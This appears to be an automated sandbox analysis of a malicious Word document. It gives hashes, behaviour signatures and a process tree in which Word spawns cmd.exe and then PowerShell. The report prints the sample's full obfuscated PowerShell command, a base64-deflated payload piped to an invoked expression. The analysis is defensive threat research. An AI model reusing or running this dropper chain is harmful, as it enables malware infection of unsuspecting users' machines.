Analysis

  • max time kernel
    54s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 01:25

General

  • Target

    a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9.doc

  • Size

    66KB

  • MD5

    442fa824fda4f1a62061dbf85af3fc23

  • SHA1

    7178263616de595882740389d175aa9c155c17c4

  • SHA256

    a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9

  • SHA512

    1dc52ea851db31b703ef1777eb90df87d802bab3b21b2c717aa2a953ed3b378d4ae13932e28e7c0e9707ec9b32d83786f4963e20a517d448606b98a2f59cd3f2

  • SSDEEP

    768:0VucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBs3ylZUbu11qrOhdr:0ocn1kp59gxBK85fBYyUzOh

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a25d721ff72eecb7d97eb746ce01ac6ff63e3a72fa2614fc3380919be792cbc9.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SysWOW64\CMD.exe
      CMD cMd.ExE /C "SeT mPQT=. ( $psHome[4]+$PShomE[30]+'X') (NEw-ObjEcT Io.cOMpRESsION.DefLAtesTREAm([SYstem.Io.mEMorYstREAm] [SYStEM.cOnvErT]::FRoMbASE64sTriNG('NZDRTgIxEEV/ZR+alA3SxicNzSYkiBskggYTNfGllMGtdDt1W7Yi2X+3S+T1nsmZO0MWD2VhIY5w8wUqZEsI7BU2U6PBBkG+1aKgVQhuzLnRaCuswR99gJpVB/64fts5P/nnMUbm0RzRMoU1kw2XzxfWKmx8UifAoxsptCH5+cEZlFvPn1pXXkY/vTRJIYG790u2xVpbPO806ne6mpWUrZ3RYUAnNBdkXb5kRUZvbq+pIFGvCgK2HaeWbkg/6LDnQ8rgB6jYYQNSVQOynMVM26w/MT+F5ngi6RXsDqPtO91rA+eZq6wX5mJuW9zDaJ6k50RskmcvOiWDqk5d9wc='), [systeM.Io.COMpResSiOn.coMPREsSiOnMoDE]::dECoMPrEss) ^| fOrEaCH-oBJEcT{NEw-ObjEcT SyStEm.io.StrEAmReAdER( $_ , [TExt.EncODing]::AsciI )} ).ReaDtOeNd( ) && PoWerSHelL Set-item ( 'va' +'RIablE:MY' + 'A' ) ([tYPe]( \"{0}{2}{3}{1}\" -F'E','eNt','n','viRONM' ) ) ; ( $MYa::( \"{0}{1}{3}{5}{2}{6}{4}\"-f 'GETENv','Ir','Ent','On','RIaBLe','m','vA' ).Invoke( ( \"{1}{0}\"-f 'qt','Mp' ),(\"{0}{2}{1}\" -f'pR','s','OCES' ) )) ^| ^& ( ( ^&( \"{1}{2}{0}\"-f 'le','v','ARiab') ( \"{0}{1}\" -f '*mdR','*' )).\"N`AMe\"[3,11,2]-join'' )"
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWerSHelL Set-item ( 'va' +'RIablE:MY' + 'A' ) ([tYPe]( \"{0}{2}{3}{1}\" -F'E','eNt','n','viRONM' ) ) ; ( $MYa::( \"{0}{1}{3}{5}{2}{6}{4}\"-f 'GETENv','Ir','Ent','On','RIaBLe','m','vA' ).Invoke( ( \"{1}{0}\"-f 'qt','Mp' ),(\"{0}{2}{1}\" -f'pR','s','OCES' ) )) | & ( ( &( \"{1}{2}{0}\"-f 'le','v','ARiab') ( \"{0}{1}\" -f '*mdR','*' )).\"N`AMe\"[3,11,2]-join'' )
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2912
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2732

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2104-0-0x000000002FAC1000-0x000000002FAC2000-memory.dmp

      Filesize

      4KB

    • memory/2104-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2104-2-0x000000007183D000-0x0000000071848000-memory.dmp

      Filesize

      44KB

    • memory/2104-6-0x00000000058C0000-0x00000000059C0000-memory.dmp

      Filesize

      1024KB

    • memory/2104-18-0x000000007183D000-0x0000000071848000-memory.dmp

      Filesize

      44KB

    • memory/2104-19-0x00000000058C0000-0x00000000059C0000-memory.dmp

      Filesize

      1024KB

    • memory/2912-14-0x0000000004FF0000-0x0000000005042000-memory.dmp

      Filesize

      328KB

    • memory/2912-15-0x00000000026D0000-0x00000000026DD000-memory.dmp

      Filesize

      52KB

    • memory/2912-16-0x00000000050A0000-0x00000000050DC000-memory.dmp

      Filesize

      240KB